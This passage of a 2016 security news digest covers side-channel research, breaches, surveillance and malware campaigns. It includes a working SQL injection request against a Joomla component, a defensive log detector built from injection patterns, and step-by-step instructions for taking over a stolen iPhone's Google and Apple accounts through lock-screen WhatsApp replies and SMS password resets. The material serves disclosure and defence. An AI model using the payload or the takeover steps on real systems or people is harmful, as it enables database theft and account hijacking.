The VoIP software picks up the acoustic emanations of pressed keys and transmits them to the other parties in the VoIP call.
The attack is possible because each brand of keyboard emits distinct sounds, as do the various keys on the same keyboard. The technique presented by the researchers is able to discriminate these sounds and recover the typed text with an accuracy that depends on the knowledge of the user’s typing style.
Clearly, this attack poses a serious threat to the users’ privacy.
According to the researchers, Skype conveys enough audio information to allow attackers to reconstruct the victim’s input with an accuracy of 91.7% when the target's typing style is known.
“In fact, we show that very popular VoIP software (Skype) conveys enough audio information to reconstruct the victim’s input – keystrokes typed on the remote keyboard.” states the paper published by the experts. “In particular, our results demonstrate that, given some knowledge on the victim’s typing style and the keyboard, the attacker attains top-5 accuracy of 91.7% in guessing a random key pressed by the victim. (The accuracy goes down to still alarming 41.89% if the attacker is oblivious to both the typing style and the keyboard).”
The researchers highlighted that the attack is not effective when the victim uses a touchscreen or a keypad.
The real element of innovation in this technique is that VoIP allows bypassing the need for physical proximity to the victim that other techniques required.
Flaw in Intel CPUs could allow to bypass ASLR defense
20.10.2016 securityaffairs Vulnerebility
A flaw in Intel chips could be exploited to launch a side-channel attack allowing attackers to bypass the protection mechanism known as ASLR.
A vulnerability in Intel’s Haswell CPUs can be exploited to bypass the anti-exploitation technology address space layout randomization (ASLR), which is implemented by all the major operating systems.
ASLR is a security mechanism used by operating systems to randomize the memory addresses used by key areas of processes, making it hard for attackers to find the memory location where to inject their malicious code.
ASLR is particularly effective against stack and heap overflows and is able to prevent arbitrary code execution triggered by any other buffer overflow vulnerability.
Three researchers from the State University of New York at Binghamton and the University of California in Riverside have devised a method to exploit the flaw. The technique was presented this week at the 49th annual IEEE/ACM International Symposium on Microarchitecture in Taipei.
The researchers exploited the branch target buffer (BTB) to leak ASLR addresses.
The BTB is a caching mechanism used by the CPU’s branch target predictor to optimize performance; the trio discovered a way to trigger BTB collisions between different user processes, or between a process and the kernel.
“The BTB stores target addresses of recently executed branch instructions, so that those addresses can be obtained directly from a BTB lookup to fetch instructions starting at the target in the next cycle.” states the paper published by the experts. “Since the BTB is shared by several applications executing on the same core, information leakage from one application to another through the BTB side-channel is possible.”
In order to create a BTB-based side-channel, it is necessary that three conditions are satisfied.
One application has to fill a BTB entry by executing a branch instruction.
The execution time of another application running on the same core must be affected by the state of the BTB. This happens when both applications use the same BTB entry.
The second application must be able to detect the impact on its execution by performing time measurements.
“We call the BTB collisions created between two processes executing in the same protection domain (e.g. two user-level processes) as Same-Domain Collisions (SDC).” continues the paper.
The researchers were able to successfully run the attack on a computer equipped with an Intel Haswell microarchitecture CPU and running a Linux kernel version 4.5.
In the attack, the kernel ASLR layout was recovered using BTB collisions in around 60 milliseconds.
The three researchers also described software- and hardware-based mitigations that could prevent BTB-based side-channel attacks in the future or harden current ASLR implementations.
BTB side-channel attacks are not a novelty; however, exploits that bypass ASLR usually rely on a second, memory-disclosure vulnerability in the targeted OS or application. The method presented by the researchers is very interesting because attackers don’t need to exploit another flaw to carry out the attack.
Intel did not comment on the attack.
Breaking — Russian Hacker Responsible for LinkedIn Data Breach Arrested by FBI
20.10.2016 thehackernews Crime
The alleged Russian hacker arrested by the FBI in collaboration with the Czech police is none other than the hacker who was allegedly responsible for the massive 2012 data breach at LinkedIn, which affected nearly 117 Million user accounts.
Yevgeniy N, a 29-year-old Russian hacker, was arrested in Prague on October 5, suspected of participating in cyber attacks against the United States, according to Reuters.
Earlier it was suspected that the hacker could be involved in hacking against the Democratic National Committee (DNC), or its presidential candidate Hillary Clinton, intended to influence the presidential election.
However, the latest statement released by LinkedIn suggests that the arrest was related to a 2012 data breach at the social network that exposed the emails and hashed passwords of nearly 117 Million users.
"We are thankful for the hard work and dedication of the FBI in its efforts to locate and capture the parties believed to be responsible for this criminal activity," LinkedIn said in a statement.
"Following the 2012 breach of LinkedIn member information, we have remained actively involved with the FBI's case to pursue those responsible."
Earlier this year, a hacker under the nickname "Peace" put up for sale what he claimed to be a database of 167 Million emails and hashed passwords, including 117 Million already cracked passwords, belonging to LinkedIn users.
But it is still unclear whether the arrested hacker is the same one who was selling the LinkedIn data dump on the dark web market a few months ago.
But if it turns out to be the same one, then it would be a jackpot for the FBI because 'Peace' is the hacker who was also responsible for selling data dumps for MySpace, Tumblr, VK.com, and Yahoo! on the dark web marketplace.
Czech police said that a court would take the decision on the hacker's extradition to the U.S., where he is facing charges for his hacking-related crimes.
We will update the story as soon as we get official confirmation from the U.S. feds.
Police Scan 117 Million Driving Licence Photos for Face Recognition Database
19.10.2016 thehackernews BigBrothers
Your driver's license photo could be scarier than it actually looks — Well, here's why:
With the help of state driver's license data, U.S. law enforcement agencies have created a huge face-recognition database of more than 117 Million American adults that is regularly scanned in the course of police investigations.
What's even worse? Most of those people who are scanned by police without prior knowledge are law-abiding citizens.
According to a 150-page study published Tuesday by the Center for Privacy & Technology at the Georgetown University, ID photographs of more than 117 Million adult US citizens — that's about half of the US population — are now part of the "Perpetual Line-up," which can be searched using facial-recognition software.
In the past few years, facial recognition technology has improved enormously. Even big technology companies like Facebook have developed facial recognition software so powerful that it can identify you in photos even when your face is hidden.
So, why would law enforcement be left behind?
Currently, at least 26 states reportedly allow their law enforcement agencies to run face recognition searches against their driver's license databases, while dozens of local law enforcement agencies are using commercial software to scan images captured by ATM cameras and other surveillance devices.
This clearly indicates that millions of law-abiding American citizens are potentially being pulled into the dragnet, raising legal and privacy concerns about the use of this facial recognition software, the report explains.
The report calls the use of facial recognition systems "highly problematic" because of their potential to identify and monitor innocent citizens. Police departments usually keep fingerprint and DNA databases, but those are typically collected from criminals or people who have been arrested, not the general public.
"Innocent people don't belong in criminal databases," said Alvaro Bedoya, the co-author of the report. "By using face recognition to scan the faces on 26 states' driver's license and ID photos, police and the FBI have basically enrolled half of all adults in a massive virtual line-up. This has never been done for fingerprints or DNA. It's uncharted and frankly dangerous territory."
Another area of concern is that out of 52 agencies that use or have used face recognition, only one — Ohio's Bureau of Criminal Investigation — has a policy in place to prevent its officers from using the software to track religious, political or other free speech activities.
Accuracy is also a strong concern, because facial recognition is far from perfect: one leading provider of face scanning tools says its reliability rating is only 95 percent.
Meanwhile, the facial-recognition technology is reportedly less accurate when used to identify black people, women and those aged 18 to 30.
"An accurate algorithm correctly identifies a face in an ATM photo and leads police to a robber's door," the report suggests. "An inaccurate algorithm sends them to the wrong house — and could send an innocent person to jail."
The report also describes how the facial recognition technology is spreading rapidly and is almost entirely unregulated.
The findings argue the First Amendment is meant to protect "our right to express ourselves anonymously," and warn that police use of face recognition "to continuously identify anyone on the street—without individualized suspicion—could chill our basic freedoms of expression and association, particularly when face recognition is used at political protests."
In response to this report, over 50 civil liberties groups, including the American Civil Liberties Union (ACLU), delivered a letter to the Department of Justice's Civil Rights Division Tuesday asking it to investigate the expanding use of face recognition technology around the country by police.
Using facial recognition technology, "Police are free to identify and potentially track anyone even if they have no evidence that that person has done anything wrong," says ACLU's legislative counsel Neema Singh Guliani. "We do not expect that the police can identify us when we're walking into a mosque, attending an AA meeting, or when we are seeking help at a domestic violence shelter."
According to the dozens of signatories, the routine, unsupervised use of face recognition systems threatens the privacy and civil liberties of millions, especially immigrants and people of color.
For in-depth information, you can read the report [PDF], titled "The Perpetual Line-up: Unregulated Police Face Recognition in America."
SQL Injection zero-day in component ja-k2-filter-and-search of Joomla
19.10.2016 securityaffairs Vulnerability
Information Security experts have discovered an SQL injection zero-day vulnerability in Joomla component ja-k2-filter-and-search.
Information security researchers Dimitrios Roussis and Evangelos Apostoloudis have discovered an SQL injection vulnerability in the ja-k2-filter-and-search component (https://www.joomlart.com/joomla/extensions/ja-k2-search) for Joomla, a popular open-source Content Management System (CMS).
This component is used on many Joomla sites. Using the sqlmap tool, a malicious user is able to gain access to the website database, in some cases revealing very critical or sensitive data.
This vulnerability has not yet been detected or published on any international website. In addition, the component developer had not been informed about this critical issue, so none of the well-known vulnerability databases have been updated. Therefore this vulnerability is considered a zero-day.
Any Joomla website making use of this particular component can be checked for the vulnerability with the following request.
(WhateverSite)/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27
As a result, the following error message is displayed, proving the presence of the vulnerability.
By using sqlmap with the given URL, it is evident that a dump of the database can be achieved.
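From the defender's side, the request above leaves a recognisable footprint in web-server logs. The following detector is an added example, not code from the SecNews.gr or Security Affairs post: it parses access-log lines, decodes each query parameter and flags requests carrying error-based SQL injection indicators, noting whether they target option=com_jak2filter and whether the server answered with a 5xx error. The log lines are constructed.

```python
"""
Added example, not from the SecNews.gr/Security Affairs post: flag HTTP requests that
probe the ja-k2-filter-and-search component (option=com_jak2filter) with SQL injection
indicators, by scanning web-server access logs. All log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

VULNERABLE_COMPONENT = "com_jak2filter"   # option= value used by ja-k2-filter-and-search

# Apache/nginx combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators typical of error-based SQL injection probes (the kind sqlmap emits).
SQL_INDICATORS = {
    "select_from": re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S),
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "concat_call": re.compile(r"\bconcat\s*\(", re.I),
    "floor_rand": re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),   # duplicate-key error trick
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+\s*\)", re.I),  # CHAR(..) string building
}

# Constructed sample: one normal search, one sqlmap-style probe, one quote in another component.
SAMPLE_LOG = r'''
203.0.113.5 - - [19/Oct/2016:10:01:02 +0000] "GET /index.php?option=com_jak2filter&view=itemlist&Itemid=135&searchword=the&xf_2=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Oct/2016:10:01:05 +0000] "GET /index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(CHAR(52)%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27 HTTP/1.1" 500 812 "-" "sqlmap/1.0"
203.0.113.9 - - [19/Oct/2016:10:02:11 +0000] "GET /index.php?option=com_content&view=article&id=5%27 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
'''


def decode_query(target):
    """Return {param: [decoded values]} for the query string of a request target."""
    return parse_qs(urlsplit(target).query, keep_blank_values=True)


def suspicious_params(params):
    """Map each parameter to the sorted list of indicators found in its decoded value(s)."""
    hits = {}
    for name, values in params.items():
        reasons = set()
        for value in values:
            if "'" in value or '"' in value:
                reasons.add("quote")           # the xf_2=5' probe ends in a bare quote
            for label, pattern in SQL_INDICATORS.items():
                if pattern.search(value):
                    reasons.add(label)
        if reasons:
            hits[name] = sorted(reasons)
    return hits


def inspect_line(line):
    """Return a finding dict for one log line, or None if nothing looks like an injection probe."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = decode_query(m.group("target"))
    hits = suspicious_params(params)
    if not hits:
        return None
    option = params.get("option", [""])[0]
    return {
        "ip": m.group("ip"),
        "option": option,
        "targets_vulnerable_component": option == VULNERABLE_COMPONENT,
        "params": hits,
        "server_error": int(m.group("status")) >= 500,   # error-based probes often provoke a 500
    }


def scan_log(text):
    """Run inspect_line over every non-empty line and return the list of findings."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            finding = inspect_line(line)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 5xx response to a request flagged with `floor_rand` or `select_from` against `com_jak2filter` is the log-side counterpart of the error page the researchers describe and is worth an alert on its own.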
List of Vulnerable Sites
Below is the original post, in Greek, published by SecNews.gr:
https://secnews.gr/149262/joomla-ja-k2-filter-and-search-zero-day/
Oops, the Trump Organization also uses insecure e-mail servers
19.10.2016 securityaffairs Security
According to a security researcher, the Trump Organization’s mail servers run on an outdated version of Microsoft Windows Server.
Hillary Clinton has been in the eye of the storm over her private email server, and Trump has used the case to attack his rival.
By an irony of fate, we are now discussing the fact that Trump's organization also has problems with its email servers. According to security researcher Kevin Beaumont, the Trump Organization's mail servers run Microsoft Windows Server 2003 with Internet Information Server 6, which is no longer supported by the company. The researcher also discovered that the servers are configured with minimal security.
What does this mean?
Simply put, they are an easy target for hackers, who could gain access to the organization's e-mail servers.
Kevin Beaumont ✔ @GossiTheDog
Quick update on Trump corp email servers - all internet accessible, single factor auth, no MDM, Win2003, no security patching.
00:44 - 18 Oct 2016
Beaumont also discovered the organization's web email access page. He explained that, until yesterday morning, the Trump Organization allowed Outlook Web Access logins from webmail.trumporg.com.
According to Sean Gallagher of Ars, the e-mail access page webmail.trumporg.com displays the header for Microsoft Exchange Outlook Web Access (OWA). Analysis of the page's HTML source code reveals that the site is running an outdated application: the March 2015 build of Microsoft Exchange 2007 (SP3 RU16), a version known to be affected by many security issues.
Beaumont pointed out that the email service doesn't use two-factor authentication.
Below is the comment a spokesperson for the Trump Organization sent via email to the Motherboard website; it seems to downplay the problem.
“The Trump Organization deploys best in class firewall and anti-vulnerability technology with constant 24/7 monitoring. Our infrastructure is vast and leverages multiple platforms which are consistently monitored and upgraded using current cyber security best practices.”
Security experts warn of a 12-year-old flaw. Users cannot defend themselves
19.10.2016 Novinky/Bezpečnost Vulnerabilities
Even a 12-year-old flaw can give security experts a real headache. That is exactly how old the hole is that security experts discovered in recent days; they also found that cybercriminals can exploit it to attack Internet of Things (IoT) devices. Users themselves can do practically nothing to defend against it.
What is the Internet of Things?
The abbreviation IoT (Internet of Things) denotes smart devices that are able to connect to the internet and communicate with each other over this global computer network.
Typically these are devices that allow some of their functions to be monitored or controlled remotely. They can be reached via a smartphone or tablet over the internet, even when the user is on the other side of the planet.
Various recorders and weather stations can use the global network this way, as can smart light bulbs whose colour temperature can be adjusted.
The flaw concerns OpenSSH, which is used by precisely those smart-home devices. It was reported by researchers at Akamai Technologies, one of the world's largest providers of content delivery networks.
Attackers can exploit the hole to change the proxy settings on compromised devices. That lets them control the internet traffic of those devices. With hundreds of thousands of compromised machines that obey them on command, they can carry out DDoS attacks, for example.
In such an attack a large number of PCs, in this case IoT devices, start accessing a particular server at the same moment. The server usually cannot handle such a high number of requests and goes down. To ordinary users the attacked website then appears unavailable.
More than two million devices at risk
Concern is warranted in the case of the discovered flaw. Because of the OpenSSH bug, more than two million devices could be enslaved in the way described above.
It can also be assumed that computer pirates will try to exploit the hole very quickly. Botnets, networks of enslaved computers or internet-capable devices, are a prized weapon on the black market.
With enough enslaved computers, attackers can knock practically any website offline and then, for example, blackmail its operators, demanding money for the attack to stop.
The OpenSSH flaw can only be fixed by the manufacturer of the device concerned, by releasing new firmware. Unlike with classic computers, users therefore currently have practically no way to defend themselves against the new threat.
The popularity of the Internet of Things will grow
The Internet of Things offers users great convenience, but its dark side is also becoming apparent: weak security.
By 2020, according to expert estimates, the number of devices connected to the internet will grow from the current 15 billion to 200 billion, which works out at 26 such smart devices per person.
Cyberattacks are more sophisticated; experts train their defence
19.10.2016 Novinky/Bezpečnost Cyberattack
Cyberattacks are becoming ever more sophisticated. The specialists who look after critical backbone infrastructure therefore need more frequent and more realistic training. Radim Ošťádal of the National Cyber Security Centre told journalists this at an exercise held in the Brno cyber range. The centre is part of the National Security Authority.
According to the experts, it is not only technical knowledge and equipment that matter, but also so-called soft skills, such as division of labour and the ability to coordinate.
"It is very important to divide up who on the team is responsible for what. It has happened that two members focused on one area and paid no attention to another, perhaps even more important one, and that was because they failed to agree effectively at the start," said Jan Vykopal, head of the Masaryk University security team, who evaluated the results of earlier exercises.
Conditions close to reality
Training in the cyber range makes it possible to create conditions close to reality. This time the scenario is the defence of a security system protecting a railway network and a shipment of nuclear waste against attacks by hacktivists. Experts from the public sector, companies and the security forces are divided into six teams. They must also handle simulated public information duties and communication with journalists.
"We made this year's scenario more complex; it contains more devices and services. The teams must not only manage to defend them, but must also be able to communicate with the outside world and have legal awareness of the consequences of their decisions," Vykopal said. Observers from Finland and Estonia are present at the range.
Critical information infrastructure includes, for example, the systems of mobile operators, banks and power plants, as well as traffic control networks. Similar exercises focused on defending infrastructure are common around the world; those organised by NATO, for example, are highly regarded.
Police detain in central Prague a Russian hacker who allegedly attacked targets in the USA
19.10.2016 Novinky/Bezpečnost Hacking
Czech police, in cooperation with the US Federal Bureau of Investigation (FBI), have detained an internationally wanted Russian hacker who allegedly attacked targets in the USA. After being detained the man collapsed and had to be hospitalised.
"The man was detained just 12 hours after the first operational information was received," said police presidium spokesman David Schön. According to the spokesman, the wanted man was so surprised by the police action that he put up no resistance.
"Immediately after the detention the man went into a state of collapse; the officers had to give first aid at once and he was eventually hospitalised," Schön said.
He had been moving around the Czech Republic in a luxury car accompanied by his girlfriend. The detention itself took place in one of the hotels in the centre of Prague. The Municipal Court in Prague ordered the man remanded in custody. The judicial authorities will now decide on the hacker's extradition to the USA.
Political Cyberattacks: Senior Turkish Government Officials Affected by Advanced Malware
19.10.2016 securityaffairs Virus
Experts at ElevenPaths, Telefonica's cyber security unit, provided further details on political cyberattacks leveraging advanced malicious code.
On 19 July at 11pm Ankara time, Wikileaks published the first emails that had been grabbed from the Turkish AKP. The organization led by Julian Assange, in line with its policy on publication of secret information, also released the content of the attachments, thereby spreading the malware contained in the emails.
However, many aspects of these attacks are still unknown, as ElevenPaths, Telefonica's cyber security unit, states in a recent report in which the malware samples and their malicious content were analyzed.
The Infection Vector
One of the requirements any attacker needs to handle is access to a technological infrastructure that allows him to maintain control of the infected systems without being detected. In this case, after analyzing the source IP addresses of the compromised emails, it was found that the attackers leveraged vulnerable configurations on mail servers to maximize their chances of success. This way they could perform up to three different social engineering techniques aimed at ensuring that each recipient opened the attached malicious files:
Impersonating AKP email accounts with the domain org.tr.
Using organization administration usernames as senders.
Adopting email accounts with domains that appeared to come from reliable organizations like hosting companies, operators, or other mail services.
The 2067 IP addresses that were the sources of the malicious emails, distributed worldwide, included web servers, residential ADSL connections and mail servers. The large number of IP addresses used for sending the emails, the variety of their types and their wide geographic spread served as a key element in ensuring the attackers' anonymity.
Types of Malware used in the political cyberattacks
Mainly, downloaders (programs or scripts involved in the first phase of infection, responsible for downloading the malicious file) have been found. These downloaders were focused on downloading ransomware and banking Trojans linked to massive campaigns performed by organized cybercrime syndicates for purely monetary purposes. However, the most important aspect of the research was the identification of the use of backdoor Trojans that are usually associated with information thefts and attacks that may include lateral movements or other techniques associated with Advanced Persistent Threats.
After analyzing all the malicious attachments, several senior Turkish government officials have been identified as the target of these Trojans like Bekir Bozdağ (Ministry of Justice), Ömer Çelik (Minister of European Union Affairs), Nurettin Canikli (Deputy Prime Minister of Turkey) and Hüseyin Çelik (Minister of National Education).
Traditional Security Is Not Enough
Traditional security solutions are not enough to tackle samples which are very fresh and which could be related to targeted political cyberattacks, since they are unlikely to be found on black lists. However, defense technology against advanced malware can be the solution to threats that have a very high probability of being implemented in all kinds of entities, both corporate and governmental.
In the words of Eugene H. Spafford, a well-known computer security expert, the only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards. And even then Eugene has his doubts. This case is another illustrative reason why it is always important to stay alert regarding our own defense systems.
The ‘Sin’ Card: How criminals unlocked a stolen iPhone 6S
19.10.2016 securityaffairs Apple
Even if you have an iPhone 6S protected by a 6-digit passcode plus a Touch ID fingerprint, it is possible to unlock it.
1. Introduction
You have an iPhone 6S protected by a 6-digit passcode plus a Touch ID fingerprint, and you may think that nobody can unlock it without the code, right? Wrong! At least not according to the incident we analyzed this week at Morphus Labs.
An iPhone 6S, exactly as described in the previous paragraph, was stolen three days ago. The victim told us that, right after the incident, the criminals reset some of his online service passwords, such as his Apple ID, and contacted his bank pretending to be him in an attempt to retrieve the bank account passwords. Fortunately, they couldn't reach the victim's money, but how could they reset the Apple ID password from a locked device?
To better understand this scenario, we’ve collected more information about the victim:
a) Could it have been a targeted attack, I mean, was the thief focused on stealing that iPhone specifically? Could the thief have previously grabbed the victim’s credentials using an e-mail phishing scam or something like that?
Probably not. According to the information we collected, the iPhone was the last item that the thief asked the victim for.
b) Were any IDs or other documents with the victim's information also stolen? It is important to understand whether the thief knew the victim's name or e-mail address.
No. No ID or document with the victim’s name or any other information was stolen. They just asked for money and the iPhone.
c) How long did it take the victim to lock the iPhone and SIM card?
Approximately 2 hours after the theft.
d) Was the iPhone password “guessable”?
No. The 6-digit passcode wasn't easily guessable and had no relation to the victim's car plate number or any personal information that the thief might have.
So, given this mysterious scenario, we decided to dive into the situation and understand how the victim’s iPhone was unlocked.
2. The timeline
We will now establish a timeline to organize the facts that happened on the afternoon of last October 14th:
a) 14:00 – the theft occurred;
b) 16:03 – the victim activated the lost mode of his iPhone and asked for it to be remotely erased through iCloud;
c) 16:28 – the victim’s Google Account password was changed;
d) 16:37 – the victim received an e-mail with a link to reset his Apple ID password;
e) 16:38 – a new e-mail informing the victim that the Apple ID password has been changed;
f) 16:43 – a new e-mail informing that the iPhone has been located;
g) 16:43 – a new e-mail informing that the iPhone was being erased;
So, as we can see, the victim's Google and Apple account passwords were reset by the thief of the iPhone. As we all know, unlocking an iPhone without the proper credentials is "hard to infeasible" work. So, how did they do it?
Based on the facts that we established on the timeline, we started to work on some questions that might explain what happened:
1) To change a Google account password, you have to provide at least your login, in other words, your e-mail address. How might the e-mail address have been discovered?
Despite the fact that the latest iOS version shows information and notifications even on a locked iPhone, in our simulations nothing appeared on the screen that could give the user's Gmail address away;
2) Is there a way to discover the Apple ID from the device’s IMEI?
We searched the Web and found paid services that offer exactly that: "discover the Apple ID from a given IMEI". But all of them state that this isn't an online process; it could take 24 to 48 hours to get the information you want. This was not the case here. The whole process took around 2 hours.
3) Is there a way to discover a Gmail account based on the only information that the criminal had, that is, the phone number?
We searched again and realized that Google offers a way to discover an e-mail address based on some given data: the phone number that you associate with your account, a name and a surname. As the phone number could easily be discovered in this scenario, discovering the name and surname from that phone number might not be that hard. We're starting to get somewhere…
3. The hypothesis simulation
So, we decided to follow that path and try to find the name and surname of the victim from the perspective of the thief. This time, arranging our lab wasn't a tough task. The victim bought a new iPhone 6S smartphone, configured it exactly the way the stolen one was, and gave it to us for the purpose of this research. That way, our scenario was as close as possible to the real one, including the same Google and Apple accounts.
3.1. Discovering the phone number
To obtain the phone number, we removed the SIM card from the iPhone and inserted it into another phone. As in the real scenario, no PIN lock was in place. On the other phone, it was easy to identify the phone number.
3.2. Low-hanging fruit
Now, having the phone number, we followed the "low-hanging fruit" strategy first. We tried to find the victim's name by putting his phone number into Internet search engines. Unfortunately, we didn't find anything useful.
The next approach was to look for the phone number on Facebook. We know that if you have your phone number associated with your profile, it's easy to find you by that number. Once again, nothing was found.
3.3. Thinking outside the box
Nothing from the low-hanging fruit, so it was time to think outside the box. Of course there could be different ways to find out a person's name from their phone number, but we decided to persist a little longer with the information we had on hand.
So, I remembered that I had recently changed my smartphone. While configuring the new one, my WhatsApp profile came with my photo, and I hadn't restored it from a backup. But I didn't remember whether it also came with my profile name, and I decided to see if this strategy could give us the victim's name.
To do so, we removed the SIM card from the locked iPhone and inserted it into a second smartphone with WhatsApp installed. We followed the initial configuration, receiving the SMS and so on, but unfortunately (or fortunately), WhatsApp did not load the profile name. It brought only the profile photo and status.
Still related to WhatsApp, a second idea came up. You might remember that if you are in a WhatsApp group and receive a message from a person who is not in your contact list, their name appears right after their phone number (i.e. 9999-9999 ~Mike Arnold). So, if it were possible to send a message from that locked iPhone to a WhatsApp group, we could get the name associated with that profile.
3.4. (WhatsApp + locked screen notification response) hacking
So, first, we confirmed that the iPhone was configured to show WhatsApp notifications on the locked screen by sending it a single message. The message was shown as expected. The next step was to try to answer that message from the locked iPhone. Using the "3D Touch" functionality, we were able to answer it.
With the initial validations done, it was time to try the group message approach. We created a group and included the contact associated with the locked iPhone's number. As there is no validation when you are added to a new group, once we did this a message appeared on the locked iPhone screen informing it that it was now part of that new group.
As we had to create a contact associated with the iPhone's number on the smartphone that created the group, we also had to include a third participant in the same group. This third participant had no contact data related to the iPhone's number.
So, everything was set. We sent a message from one of the group participants. As expected, the message arrived on the locked iPhone screen. We answered it from the locked iPhone and, again as expected, the message that reached the third participant came associated with the iPhone's WhatsApp profile name. Stage completed.
The next and easiest step was to put the three parameters we had discovered (phone number, name and surname) into the Google form and get the e-mail address associated with that person. Stage completed.
3.4. Changing the Google account password
Now, let’s try to replay the password change made by the criminal. The next steps were:
– Enter Google login screen;
– Choose “forget my password” option;
– Insert any text on the “last password that you remember”;
– On the next screen, Google asks for the phone number associated with the account. Only part of the phone number is shown, but the last two digits allowed us to believe we were on the right track;
– After we entered the iPhone's phone number, Google sent a code via SMS to the iPhone, to be entered on the next screen;
– After doing that, Google offered us the chance to set a new password for that account.
At that moment, we had reproduced the Google account password change by mimicking what the criminal did, and we started to think about how easy it could be, depending on how the account is set up, to change someone's Google account password having only their phone or SIM card and their first and last name, even for just a few minutes (or seconds).
3.5. Changing the Apple ID password
So, we continued following the incident timeline. In the next step we used the previously discovered Google e-mail as the Apple ID account login and chose the "forgot password" option again. After that, a message was shown informing us that an e-mail had been sent to the Google account with a link to reset the password. The rest of this paragraph is easy to figure out. We succeeded in changing the password associated with that Apple ID.
3.6. Unlocking the “new” iPhone
Based on the facts that occurred in the real incident, it was time to remotely lock and erase the iPhone we were using for the simulations.
I would bet these procedures helped the criminal get access to the iPhone. After the erase process, the iPhone asks you to enter the Apple ID and password that were previously associated with that device. And, as we had that information, it was easy to access and configure the "new" iPhone from scratch.
4. Vulnerabilities and Recommendations
Well, of course we might have followed a different strategy from the one the criminals used, but the result was the same: an iPhone unlocked without its credentials.
However, to achieve this result, there are some assumptions that we consider vulnerabilities that should be avoided:
a) Locked phone notifications
Allowing your smartphone to show notifications while locked is a great convenience. But at the same time, allowing them may represent a great risk to your privacy and security.
As shown in our experiment, this feature allowed us to read SMS and WhatsApp messages and, worse, answer them without unlocking the device.
We strongly recommend disabling "show notifications on your locked smartphone" (advice for users). Depending on your platform (Android or iOS) or app, there are different ways to configure this.
b) The ‘Sin’ Card
This episode reminded us how important it is to protect the SIM card. We all take care to lock our smartphones with strong passwords, fingerprint authentication, strong encryption and so on (don't we?), but we have to remember the importance of properly securing the SIM card.
As we saw in the experiments we did for this research, SMS is nowadays an important piece of transaction validation and authentication services. We used it to receive the Google unlock code, but it could be used to authenticate other kinds of transactions.
So, we recommend setting a PIN on your SIM card. That way, you considerably reduce the risk of impersonation if you lose your cell phone or have it stolen.
Depending on your smartphone, there are different ways to configure it. Remember that, after you set your SIM card PIN, you have to enter it every time you reboot your smartphone (which is not very convenient).
c) Two-factor authentication
Last but not least, please, enable two-factor authentication on your accounts right now! Two-factor authentication means that you have to provide a combination of at least two methods to prove your identity to the system you are dealing with. The possible factors you can pick from are these three: something that you know, like a password; something that you have, like a hard or soft token and something that you are, like your fingerprint.
Nowadays, almost all Internet services offer you the option to configure two-factor authentication, usually a password and a token. One option for the second factor is to have an SMS sent to you, but we know that this may be fragile. Preferably, choose an app, like Google Authenticator, to generate the token.
This strategy will strongly reduce the risk of unauthorized access to your accounts. If the victim of this incident had been using two-factor authentication, it would have been impossible to change his password using the SMS strategy.
5. Final words
Given the short period of time between the theft and the accounts hacking process, we believe that this strategy is widely used to unlock lost and stolen devices.
Aside from the financial loss directly involved in having an iPhone lost or stolen, this case prompts an important reflection. Are we protecting our SIM cards and SMS messages as we should? The potential impact, such as improper information access or disclosure in scenarios like the one in this article, could be even more devastating. Would it be overkill to compare an unlocked SIM card to an important password that you carry around every day, in clear text, attached to your smartphone?
Magento card-swiping malware hides stolen card data in legitimate images
19.10.2016 securityaffairs Virus
Security experts have spotted an interesting exfiltration technique adopted by crooks to exfiltrate card data from Magento platforms.
Security experts from Sucuri and RiskIQ have spotted an interesting exfiltration technique adopted by crooks to exfiltrate payment data from compromised e-commerce websites powered by the Magento platform.
Cybercriminals have been using image files to store and exfiltrate payment card data stolen from the target websites. This latest wave of attacks targeted over 100 online shops running on the Magento, Powerfront CMS and OpenCart e-commerce platforms.
Typically attackers use card-swiping malware that steals credit card data from the Magento shop and exfiltrates it via email or by storing the information in a file that is later retrieved by the hackers.
Experts noticed an interesting attack on Magento shops in which cybercriminals used a malicious PHP file that dumps stolen data into an image file.
Similar exfiltration techniques are common; however, attackers usually don't use files containing real images to store the information.
“This is not out of the ordinary. It is actually characteristic of a lot of the credit card swipers we have seen lately.” reads a blog post published by Sucuri.
“Attackers use image files as an obfuscation technique to hide stolen details from the website owner. The image file usually doesn’t contain a real image, however, no one really suspects an image file to contain malware. This gives the attacker a secret place to store data. If the attacker had chosen to store the stolen credit card details in a simple text file then it might be easier for someone to discover it and take steps to remove the hack.”
In this specific case, the images used to store the payment card data are real and belong to products offered for sale on the compromised website. This lets the attackers stay under the radar and avoid raising suspicion.
The stolen data is appended in clear text at the end of the image file, and the file is publicly accessible. According to Sucuri, most of the stolen card data came from the United States, but the files also include data on victims from Japan, Turkey, Saudi Arabia and Canada.
“To obtain the stolen numbers the attacker would not even have to maintain access to the site. The image was publicly accessible. All the attacker would need to do is download the image from the website just like any other and view its source code.” continues the post.
